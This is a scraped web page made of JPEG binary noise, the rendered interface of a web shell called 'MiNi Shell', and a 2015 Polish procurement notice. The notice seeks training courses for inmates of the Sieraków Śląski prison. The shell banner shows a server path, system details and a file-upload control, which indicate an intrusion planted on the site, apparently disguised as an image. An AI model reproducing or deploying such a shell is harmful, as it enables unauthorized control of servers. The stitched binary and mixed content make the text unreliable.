JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150427/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150427/96480-N-2015.html

<p class="kh_header"><b>Sieraków Ślaski: Przeprowadzenie 2 pakietów szkoleń w Zakładzie Karnym w Sierakowie Śląskim finansowanych ze środków NMF</b><br>
<b>Numer ogłoszenia: 96480 - 2015; data zamieszczenia: 27.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Sierakowie Śląskim , Ul. Cegielniana 13, 42-793 Sieraków Ślaski, woj. śląskie, tel. 343538505, faks 343538505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie 2 pakietów szkoleń w Zakładzie Karnym w Sierakowie Śląskim finansowanych ze środków NMF.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi, polegające na przeprowadzeniu 2 pakietów szkoleniowych. Każdy z pakietów składa się z 4 kursów szkoleniowych  dla grupy 10 skazanych, osadzonych w Zakładzie Karnym w Sierakowie Śląskim. Każdy z 10 uczestników szkolenia, w ramach pakietu, winien odbyć 1 szkolenie kursowe zawodowe (ogrodnik), 1 szkolenie z zakresu aktywizacji zawodowej, 1 szkolenie z problematyki ekologicznej oraz 1 szkolenie z zakresu przeciwdziałania przemocy lub szkolenie z dziedziny profilaktyki uzależnień z zastrzeżeniem, iż szkolenie z dziedziny profilaktyki uzależnień musi być przeprowadzone jako pierwsze natomiast szkolenie z zakresu przeciwdziałania przemocy  musi być przeprowadzone jako drugie.

Pierwszy pakiet składa się z:
- szkolenia przyuczającego do zawodu o tematyce ogrodnik,
- szkolenia kompetycyjnego w zakresie aktywizacji zawodowej
- szkolenia ekologicznego(szkolenie kompetencyjne),
- szkolenie z dziedziny profilaktyki uzależnień.

Drugi  pakiet składa się z:
- szkolenia przyuczającego do zawodu o tematyce ogrodnik,
- szkolenia kompetycyjnego w zakresie aktywizacji zawodowej
- szkolenia ekologicznego(szkolenie kompetencyjne),
- szkolenie z dziedziny profilaktyki antyprzemocowej.

Kod CPV: 80500000-9

Kursy szkoleniowe zostaną zorganizowane w ramach wdrażania i realizacji Programu PL-17 pn. Wsparcie Służby Więziennej, w tym sankcji pozawięziennych - finansowanego ze środków Norweskiego Mechanizmu Finansowego dotyczącego Projektu nr 1 pn.  - Realizacja szkoleń podnoszących kompetencje społeczno - zawodowe więźniów oraz stworzenie warunków ułatwiających podtrzymanie więzi rodzinnych w celu zwiększenia efektywności ich powrotu do społeczeństwa po zakończeniu odbywania kary.

1.1  Warunki szczegółowe:

Szkolenie kursowe (zawodowe) o tematyce:   ogrodnik

a) cel kursu: nabycie teoretycznych i praktycznych umiejętności do samodzielnej pracy przy zagospodarowywaniu terenów zielonych
b) czas trwania: 70 godzin dydaktycznych/osobę (1 godz. = 45 min), w tym:
zajęcia teoretyczne: 20 godzin/osobę
zajęcia praktyczne: 50 godzin/osobę
c) zagadnienia:
- zasady organizacji pracy na stanowisku roboczym: przygotowywanie terenów zielonych pod zagospodarowanie, wysiewanie nasion, sadzenie i przesadzanie roślin, przycinanie roślin, nawożenie i nawadnianie roślin, zakładanie i pielęgnowanie trawników, usuwanie chwastów, wykonywanie zabiegów z zakresu ochrony roślin, organizowanie stanowiska pracy zgodnie z zasadami BHP i ochrony ppoż., ochrony środowiska i ergonomii 
- przepisy bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej,
- budowa podkaszarek / kos /spalinowych,
- technika pracy podkaszarką / kosą /  spalinową.
d) miejsce przeprowadzenia zajęć:
-   zajęcia teoretyczne: na terenie Zamawiającego
-   zajęcia praktyczne: na terenie Zamawiającego 
e) maksymalny dzienny wymiar szkolenia: 10 godzin dydaktycznych tj. 10 x 45 minut z jedną przynajmniej 30 minutową przerwą obiadową oraz dwoma przerwami 15 - minutowymi w trakcie zajęć, 
f)  zakupione materiały siewne, rośliny i narzędzia do realizacji zajęć praktycznych winny zawierać się w kwocie nie mniejszej niż 35% i  nie większej niż 40% ceny ogólnej kursu, zleceniobiorca jest zobowiązany do udokumentowania zleceniodawcy poniesionych wydatków na zakup  materiałów siewnych, roślin, nawozów i narzędzi w postaci faktur lub innego dowodu zakupu.
g) zleceniobiorca zapewni wywóz wszelkich odpadów pozostałych po zakończeniu kursu.
h) zleceniobiorca pokryje wszystkie koszty związane z realizacją kursu tj.: 
-  usługę szkoleniową, 
-  badanie lekarskie potwierdzające brak przeciwwskazań do wykonywania pracy na danym  
   stanowisku,
-  ubezpieczenie NNW uczestników na kwotę 5000 zł na każdego uczestnika szkolenia, 
-  koszt nowej odzieży roboczej i nowych butów roboczych dla wszystkich uczestników szkolenia    
   praktycznego,
-  koszt odzieży ochronnej, butów roboczych oraz sprzęt ochrony indywidualnej dla operatorów    
   kos spalinowych - w zakresie niezbędnym do zrealizowania szkolenia - przynajmniej jeden    
   komplet
-  koszt materiałów pędnych, żyłek itp. do  kos spalinowych - w zakresie niezbędnym do  
   zrealizowania szkolenia oraz dokonania konserwacji sprzętu po sezonie.
-  zakup wody mineralnej dla uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra   
   dziennie na jednego uczestnika, 
-  zakup materiałów niezbędnych do realizacji szkolenia zawodowego  tj. podręczniki, zeszyty,   
   długopisy  
-  innych materiałów  dydaktycznych
-  koszt narzędzi ogrodniczych niezbędnych do realizacji zajęć praktycznych - 5    
   grabi do liści typu pazurki , 
-  koszt sadzonek, trawy i innych mat. siewnych, ziemi w ilości niezbędnej,  nawozów i mat.       
   pomocniczych , w tym:     
-  rollbordery o długości 100 metrów do zabezpieczenia sadzonek przed podkoszeniem,
-  trawa Barenbrug Water Saver  lub Barenbrug Wonderlawn Hot&Dry lub California Sun czyli     
   trawy przeznaczone na powierzchnie piaszczyste i suche w ilości przynajmniej 15 kg na każdy z     
   kursów
-  sadzonki berberysu czerwonolistnego w ilości 100 sztuk, sadzonki żywotnika orientalis w ilości     
   30 sztuk,  jałowiec płożący w ilości 30 sztuk, bukszpanu w ilości 50 sztuk oraz thuje ozdobne     
   oraz inne krzewy ozdobne  przeznaczone na tereny piaszczyste i suche                
-  w czasie każdego z dwóch szkoleń zawodowych, obszar na którym winne zostać zrealizowane     
   zajęcia  praktyczne to obszar o areale nie mniejszym niż 500 metrów kwadratowych, który 
   zostanie wskazany przez zamawiającego 
i) zleceniodawca zapewnia sprzęt potrzebny do realizacji szkolenia w postaci 5 kos spalinowych,

Szkolenie kompetencyjne z zakresu aktywizacji zawodowej

a) cel szkolenia: poznanie podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy
b) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
c) zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej, wynikające z programu szkolenia w klubie pracy, m.in.:
- autoprezentacja, 
- komunikacja z pracodawcą,
- rozmowa kwalifikacyjna, 
- dokumenty aplikacyjne, 
- sposoby poszukiwania pracy,
- poznawanie i odkrywanie umiejętności oraz predyspozycji zawodowych.
d) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
e) maksymalny dzienny wymiar szkolenia: 10 godzin dydaktycznych tj. 10 x45 minut z jedną przynajmniej 30 minutową przerwą obiadową oraz dwoma przerwami 15 - minutowymi w trakcie zajeć, 

Szkolenie ekologiczne (szkolenie kompetencyjne)

a) cel szkolenia: poznanie podstawowych zagadnień z zakresu ekologii i ochrony środowiska
b) czas trwania: 10 godzin dydaktycznych/osobę (1 godz. = 45 min.)
c) zagadnienia:
- ochrona lasów i terenów zielonych,
- gospodarowanie odpadami komunalnymi i selektywnymi.
d) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
e) maksymalny dzienny wymiar szkolenia: 10 godzin dydaktycznych tj. 10 x45 minut z jedną przynajmniej 30 minutową przerwą obiadową oraz dwoma przerwami 15- minutowymi w trakcie zajeć, 

Szkolenie z dziedziny profilaktyki uzależnień (w przypadku pierwszego pakietu)

a) cel szkolenia: poznanie podstawowych zagadnień z zakresu profilaktyki uzależnień
b) czas trwania: 10 godzin dydaktycznych/osobę (1 godz. = 45 min.)
c) zagadnienia:
- uzyskiwanie informacji o alkoholu i innych substancjach uzależniających, oraz zagrożeniach towarzyszących ich zażywaniu;
- zaopatrzenie skazanych w wiedzę na temat istoty uzależnień oraz sposobów radzenia sobie z nimi;
- stworzenie możliwości odniesienia zdobytej wiedzy do własnej osoby
- wytworzenie rzeczywistej motywacji do zmiany poprzez pokazanie destrukcji spowodowanej uzależnieniami;
- wskazanie możliwości unikania zagrożeń jakie niesie używanie środków psychoaktywnych, sposobów radzenia sobie z tymi zagrożeniami oraz możliwości odnalezienia wsparcia w radzeniu sobie z nimi;
- pokazanie perspektyw zdrowego życia i drogi do satysfakcji osobistych oraz sposobów radzenia sobie z problemami bez zażywania środków psychoaktywnych
d) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
e) maksymalny dzienny wymiar szkolenia: 10 godzin dydaktycznych tj. 10 x 45 minut z jedną przynajmniej 30 minutową przerwą obiadową oraz dwoma przerwami 15 - minutowymi w trakcie zajeć, 

Szkolenie z dziedziny przeciwdziałania przemocy ( w przypadku drugiego pakietu)

a) cel kursu: poznanie podstawowych zagadnień z zakresu przeciwdziałania przemocy
b) czas trwania: 10 godzin dydaktycznych/osobę (1 godz. = 45 min.)
c) zagadnienia:
- zwiększenie kompetencji skazanych w zakresie rozwiązywania sytuacji trudnych
- kształtowanie umiejętności prospołecznych,
- kształtowanie postawy empatycznej,
- budowanie prawidłowej samooceny,
- zwiększenie poczucia odpowiedzialności za siebie i własne zachowania,
- wyuczenie i umiejętności rozpoznawania własnych negatywnych stanów emocjonalnych
- przełamanie schematów poznawczych reagowania w sytuacjach trudnych na korzyść zachowań asertywnych,
d) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
e) maksymalny dzienny wymiar szkolenia: 10 godzin dydaktycznych

2. Pierwszy z pakietów szkoleń rozpocznie się nie wcześniej niż 20 maja. a zakończy nie wcześniej niż 1 czerwca 2015 r. Drugi z pakietów szkoleń  zakończy się w dniu 30 czerwca 2015 r. Szkolenia nie mogą się na siebie nakładać.
3. Szkolenia zostaną zrealizowane od poniedziałku do soboty w terminach zatwierdzonych przez Zamawiającego w harmonogramie do umowy. Harmonogram za porozumieniem stron może ulec zmianie w trakcie trwania szkolenia.  
4. Wykonawca zapewnia prowadzenie zajęć przez wykwalifikowaną kadrę, posiadającą odpowiednie wykształcenie kierunkowe.
5. Wykonawca pokryje wszystkie koszty związane z realizacją każdego z pakietów szkoleniowych tj.: usługę szkoleniową, ubezpieczenie NW uczestników, zakup materiałów dydaktycznych, w tym materiałów dydaktycznych  dla każdego z uczestników pakietu szkoleniowego oraz zakup wody mineralnej  w ilości 1,5 litra dziennie na  jednego uczestnika szkolenia oraz wszelkie inne zobowiązania zawarte w warunkach szczegółowych w punkcie 1.1.
6. Po zakończeniu szkolenia wykonawca zobowiązany jest do wystawienia każdemu z uczestników zaświadczenia o ukończeniu szkolenia,  wg wzoru stanowiącego załącznik do Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych oraz certyfikatu uczestnictwa w szkoleniu opatrzonego właściwym dla Norweskiego Mechanizmu Finansowego 2009-2014 logotypem oraz zapisem umożliwiającym identyfikację źródeł finansowania szkolenia, przygotowanego wg własnego projektu. Koszty wydania zaświadczeń i certyfikatów pokrywa Wykonawca.
7. Wykonawca zobowiązuje się do samodzielnego gromadzenia danych osobowych uczestników szkolenia i przetwarzania ich zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. 2002 nr 101, poz. 926, z późn. zm.).
8. Wykonawca zobowiązany jest do umieszczania na dokumentacji szkoleniowej obowiązujących logotypów właściwych dla Norweskiego Mechanizmu Finansowego 2009-2014 oraz zapisu umożliwiającego identyfikację źródeł finansowania.  
9. Wykonawca zobowiązuje się do prowadzenia zgodnie z zapisami § 75 ust. 5                                rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 12 grudnia 2011 roku  w sprawie standardów i warunków prowadzenia usług rynku pracy, (Dz. U. z 2011r. nr 279, poz. 1641) dokumentacji przebiegu szkolenia, w szczególności:
a) dziennika zajęć edukacyjnych, zawierającego wymiar godzin i tematy zajęć edukacyjnych oraz listę obecności zawierającą: imię, nazwisko i podpis uczestnika. 
b) rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia. 
10.  Do obowiązków Wykonawcy należy również:
a) przedstawienie do akceptacji, najpóźniej w dniu podpisania umowy, szczegółowego harmonogramu realizacji zajęć w którym zaplanowany jest termin rozpoczęcia i zakończenia szkolenia, programu szkolenia oraz wzoru zaświadczenia potwierdzającego ukończenie szkolenia  Harmonogram, program zajęć oraz wzór zaświadczenia wymagają zatwierdzenia przez zleceniodawcę.
Program szkolenia powinien zawierać w szczególności:
- nazwę formy kształcenia,
- czas trwania, liczbę godzin kształcenia i sposób jego organizacji,
- cele kształcenia i sposoby ich osiągania, z uwzględnieniem możliwości indywidualizacji pracy uczestników kształcenia w innych formach pozaszkolnych, w zależności od ich potrzeb  i możliwości,
- plan nauczania określający nazwę zajęć oraz ich wymiar,
- treści nauczania w zakresie poszczególnych zajęć,
- opis efektów kształcenia,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób i formę zaliczenia.
b) bieżące sprawowanie nadzoru nad frekwencją uczestników szkolenia poprzez sporządzanie imiennej listy obecności słuchaczy opatrzonej ich podpisami koloru niebieskiego lub zielonego.
11. Zamawiający zastrzega sobie prawo do sprawowania nadzoru nad przebiegiem i obsługą organizowanego szkolenia przez cały okres jego trwania.
12. Odzież robocza i buty robocze  zakupione na potrzeby realizacji zajęć praktycznych kursu zawodowego po zakończeniu kursu przechodzi na własność uczestników kursu.
13.  Zleceniodawca zapewnia 5 pilarek spalinowych na potrzeby zajęć praktycznych. Koszt odzieży i  sprzętu ochronnego wymagalnego przy obsłudze pilarek, paliwo, oleje, smary do pilarek oraz  koszty związane z konserwacją  pilarek po zajęciach praktycznych pokrywa zleceniobiorca. 
14.  Miejsca do przeprowadzenia zajęć praktycznych ustali Zleceniodawca.
15. Termin przeprowadzenia szkolenia po uzgodnieniu przez Zleceniodawcę i Zleceniobiorcę zostanie określony w osobnym harmonogramie do umowy z uwzględnieniem punku 1.2 opisu przedmiotu zamówienia.
16. Szkolenie  winno być przeprowadzone zgodnie z obowiązującymi przepisami krajowymi w tym w szczególności  z rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r w sprawie kształcenia ustawicznego w formach pozaszkolnych ( dz. U. z 2012, poz.186 ze zm.) oraz Rozporządzeniem Ministra Sprawiedliwości  z dnia 13 lutego 2004 r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych ( Dz. U. z 2004, Nr 37, poz 337 ze zm. )
17. Umowa szkoleniowa winna spełniać warunki określone w Zarządzeniu Nr 33/2013 Dyrektora  Generalnego Służby Więziennej z dnia 18 lipca 2013 r. w sprawie zasad  gospodarki finansowej  projektów realizowanych przez SW w ramach  Norweskiego Mechanizmu Finansowego 2009 - 2014..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 20.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wpis do rejestru instytucji szkoleniowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia na podstawie złożonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia na podstawie złożonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia na podstawie złożonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia na podstawie złożonych do oferty oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo - jeżeli jest wymagane, wpis do rejestru instytucji szkoleniowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści złożonej oferty w przypadkach wymienionych poniżej (zgodnie z art. 144 ust. 1 ustawy Pzp):
a) zmiana osób reprezentujących strony w przypadkach zmian organizacyjnych,
b) zmiana przepisów powszechnie obowiązujących, która wymusza zmianę treści umowy,
c) zmiany wynikające z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy, a są one korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Sierakowie Śląskim
ul. Cegielniana 13
42-793 Ciasna
pok. nr 57.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2015 godzina 10:00, miejsce: Zakład Karny w Sierakowie Śląskim
ul. Cegielniana 13
42-793 Ciasna
Sekretariat - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kursy szkoleniowe zostaną zorganiz. w ramach wdrażania i realizacji Programu PL-17 pn. Wsparcie Służby Więziennej, w tym sankcji pozawięziennych, finansowanego ze środków Norweskiego Mechanizmu Finansowego dotyczącego Projektu nr 1 pn. Realizacja szkoleń podnoszących kompetencje społeczno - zawodowe więźniów oraz stworzenie warunków ułatwiających podtrzymanie więzi rodzinnych w celu zwiększenia efektywności ich powrotu do społeczeństwa po zakończeniu odbywania kary..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com